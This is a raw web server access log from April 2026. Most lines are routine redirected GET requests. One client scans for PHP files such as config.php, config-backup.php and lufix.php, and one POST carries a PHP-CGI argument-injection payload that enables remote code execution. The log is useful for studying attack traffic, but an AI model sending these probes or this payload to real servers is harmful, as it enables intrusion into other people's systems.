20.104.201.101 - - [05/Apr/2026:01:12:33 -0400] "GET /class-wp-html-doctype-info.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:39 -0400] "GET /class-wp-html-open-elements.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:42 -0400] "GET /class-wp-html-processor-state.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:47 -0400] "GET /class-wp-html-processor.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:59 -0400] "GET /class-wp-html-span.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:13:01 -0400] "GET /class-wp-html-stack-event.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:13:14 -0400] "GET /class-wp-html-tag-processor.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:13:20 -0400] "GET /class-wp-html-text-replacement.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:13:36 -0400] "GET /class-wp-html-token.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:13:57 -0400] "GET /class-wp-html-unsupported-exception.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:14:20 -0400] "GET /config-backup.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:14:25 -0400] "GET /config.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:14:43 -0400] "GET /html5-named-character-references.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:14:51 -0400] "GET /index.php HTTP/1.1" 302 390 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:15:07 -0400] "GET /lufix.php HTTP/1.1" 302 274 "-" "-"
206.189.35.70 - - [05/Apr/2026:01:29:29 -0400] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
176.65.151.74 - - [05/Apr/2026:01:31:15 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.228.53.136 - - [05/Apr/2026:01:40:04 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.236.228.227 - - [05/Apr/2026:01:44:47 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.65.151.74 - - [05/Apr/2026:01:56:18 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.151.74 - - [05/Apr/2026:02:23:40 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.86.227.60 - - [05/Apr/2026:02:44:59 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0"
43.130.16.140 - - [05/Apr/2026:02:48:23 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.94.95.40 - - [05/Apr/2026:02:48:26 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0"
176.65.151.74 - - [05/Apr/2026:02:48:39 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [05/Apr/2026:03:05:15 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1"
176.65.151.74 - - [05/Apr/2026:03:11:25 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.149.227 - - [05/Apr/2026:03:24:22 -0400] "GET / HTTP/1.1" 302 390 "-" "-"
